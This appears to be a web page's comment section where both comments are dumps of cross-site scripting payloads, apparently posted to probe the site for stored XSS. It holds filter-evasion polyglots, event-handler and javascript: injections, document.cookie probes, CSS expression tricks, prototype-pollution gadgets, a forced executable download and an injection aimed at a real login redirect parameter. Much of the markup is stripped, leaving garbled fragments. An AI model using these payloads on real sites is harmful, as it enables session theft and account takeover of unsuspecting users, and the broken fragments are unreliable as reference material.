
3 Comments

  1. “>
    “>123@sdf.com
    “>
    {{$on.constructor(‘alert(1)’)()}}
    {{constructor.constructor(‘alert(1)’)()}}
    ><?Title/</Style/</Textarea/<Body/OnPageShow=(confirm)(1)

    */ alert(1)//
    ” onclick=alert(1)// */ alert(1)//
    Link

    1′”>
    <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f

    html += “”;
    <img src=x onerror="alert(document.cookie);"
    .jpg’ />
    click
    “>”@x.y

    #’>


    “/ondblclick=`z
    <svg ( =prompt, (1)) “”> pear
    <–° –!> ‘
    “/onload=confirm()// ¢ .. §
    click
    er aan
    z on .
    “‘..lpe/Title/</Style/</Script/</Textarea/</Noscript/</Pre/#
    : ee

    <img/src=`%00` onerror=this.onerror=confirm(1)
    ">%00
    <iframe/src="data:text/html,”>
    &#00;
    <img/&#0
    XYZ

    <p title="”>
    <img src="”/>
    “>
    “>
    “>

    ">{-o-link-source&colon;”
    OnMouseOver {Firefox & Opera
    /*iframe/src*/<iframe/src="
    <plaintext/onmouseover=prompt(1)
    DIV

    <iframe/src \/\/onload = prompt(1)
    <iframe/onreadystatechange=alert(1)
    <input type="text" value=“ X

    style=”x:”>
    <–` –!>
    x

    ">{-o-link-source&colon;”

    <!–
    <img src="
    LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}

    <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
    “)
    alert(String.fromCharCode(88, 115, 115, 32, 66, 121, 32, 79, 108, 100, 77, 111, 104, 97, 109, 109))
    “>
    javascript:prompt(document.domain)&return_to=https%3A%2F%2Fapp.shopify.com%2Fservices%2Flogin%2Fidentity_callback%3Fshop_name%3D123ashketchum%26state%3D6a_2K0iBEBMG3sv07qFMrtzfrBFY4gZ9JsN0EJAW2Xck07xlkghl0tmZwGIvYEZ1KZw2mG4d4Omhl_h5oB_7t4dcXoS37UUOMG6f9sOr7BCKyR23PWbLpVlh4A0lMXmNuxOEUeEA55eapNpVZqT6AyfnJkQhn4K89-I5O6TVqcamtHaXWRH7b1EI6U8LvQFddrBPYniYGpggAwsFLvb5UeTvRw-fbvRditQ20YWYTK8%253D&ui_locales=en&upgradeable=true&ux=shop

    Test

    XSS
    XSS via target in a tag

    Object.prototype.tagName = ‘img’Object.prototype.src = [‘x:x’]Object.prototype.onerror = [‘alert(1)’](function() {var View = Mn.View.extend({template: ‘#template-layout’});var App = Mn.Application.extend({region: ‘#app’, onStart: function() {this.showView(new View());}});var app = new App();app.start();})();xxx
    XSS
    <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
    <p title=" *{/*all*/color/*all*/:/*/#e84393/*all*/;}
    ”@x.y

    #’>
    templates.input = _.template(‘<input class="” type=”” name=”” />’);
    ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))
    ABCalert(1)

    /**/
    “>
    “>
    jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/\x3csVg/\x3e
    Click Here

    aaa
    aaa

    ba1man”>alert(document.cookie)
    onmouseover=alert(1)
    t00t
    “;!—“”alert(document.cookie);=&{(alert(document.cokie))}
    *””*
    “>(1)alert(1)
    Example Attack
    poc
    alert(“XSS”)”>
    <!–
    STORED XSSt(“OpenRemoteReport”)>
    *”>alert(document.cookie)*
    “>alert(document.cookie)

    alert(“3: “+document.domain)
    var link = document.createElement(‘a’);link.href = ‘http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe’; link.download = ”; document.body.appendChild(link); link.click();

    13″–>”>’` — `<!–
    “accesskey%3d”x”onclick%3d”alert`XSS`”
    ‘);
    “ab”

    “>123”
    “‘> or “/>
    “>alert(‘XSS’)

    m0ze1″–>
    m0ze1”–>
    <!–m0ze
    <!–m0ze

    <!–
    %3cscript%3ealert(1)%3c%2fscript%3e
    “AAAAAAA”
    “>
    <–` –!>
    {“type”:”general”,”name”:”alert(0)”,”mail”:”mail@example.com”,”subject”:”alert(1)”,”message”:”alert(2)”}
    alert(“XSS&quot
    bKtx(9366)
    e”>zi2u(9111)
    “>#”>
    >”>alert(“XXS POC”)
    ss”>
    “>alert(“Ismail Tasdelen”)
    from]alert(‘XSS-1’)&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all])alert(‘XSS-2’)
    [video=PAYLOAD]http://victim.com[/video]
    getpage=html%2Findex.html&errorpage=alert(‘r3m0t3nu11’)&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
    teertertalert(‘1’)
    “”>alert(‘1’)<a
    "onmouseover=" alert(document.cookie)
    list"

    alert(“XSS”)”>

    “>
    “>
    “>
    “>Clickme
    “>Clickme
    “>Clickme
    “>click
    “>
    “>clickme
    “>
    “>
    “>
    “>Clickme
    “>Clickme
    “>Clickme
    “>
    “>clickmeonchrome
    “>hoveme
    “>
    “>
    “>DragMe
    –>hello.
    XSS


    <alert("test");//

    <svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/\x3csVg/\x3e’; “>
    //’/–>12′)//”“>test
    ‘;”>’>alert(String.fromCharCode(88,83,83))
    <scriPt>alert(document.cookie)</sCript>

    <img src=/ onerror=confir\u006d(document.cookie) /><script>
    Y000
    </script>alert(document.cookie)</script>
    aaaaaaaaaaaaaaa”>alert(document.cookie)
    “>: “> –!> “> “> “> “> “> >”script>alert(document.cookie)/script> break Content-Security-Policy with ‘–>”> “/>
    Tocuch me!
    “>>

  2. X
    // window.opener still works


    X

    X

    CLICK // window.opener will be null
    CLICK // window.opener will be null
    CLICK // window.opener still works
    CLICKME// window.opener still works
    CLICKME// window.opener still works
    <iframe srcdoc="
    <a href="javascript:&apos;CLICK

    @keyframes x{}

    <!–
    <img src="

    <img src="

    XXX
    alert(1)

    // Firefox only
    <b alert(1)//0
    document.getElementById(“div2”).innerHTML = document.getElementById(“div1″).innerHTML;

    // O10.10↓, OM10.0↓, GC6↓, FF
    // IE6, O11.01↓, OM10.1↓
    // IE6, O10.10↓, OM10.0↓
    x
    alert(1)”>
    alert(1)”>

    <img src="x` `alert(1)”` `>
    XXX


    <!–[if –>

    <!– `

    X
    p[foo=bar{}*{-o-link:’javascript:alert(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};
    <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
    @import “data:,*%7bx:expression(write(1))%7D”;
    XXXXXX
    *[{}@import’test.css?]{color: green;}X
    * {-o-link:’javascript:alert(1)’;-o-link-source: current;}
    XXX
    XXX
    XXX

    *{x:expression(write(1))}
    PRESS ENTER
    X
    X
    X
    with(document.getElementById(“d”))innerHTML=innerHTML
    ({set/**/$($){_/**/setter=$,_=1}}).$=alert
    ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x
    Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()
    history.pushState(0,0,’/i/am/somewhere_else’);
    {alert(1)};1
    +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
    0?Worker(“#”).onmessage=function(_)eval(_.data) :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
    crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)
    [{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]

    &x;

    1
    1
    1
    1
    XXX


    Drop me
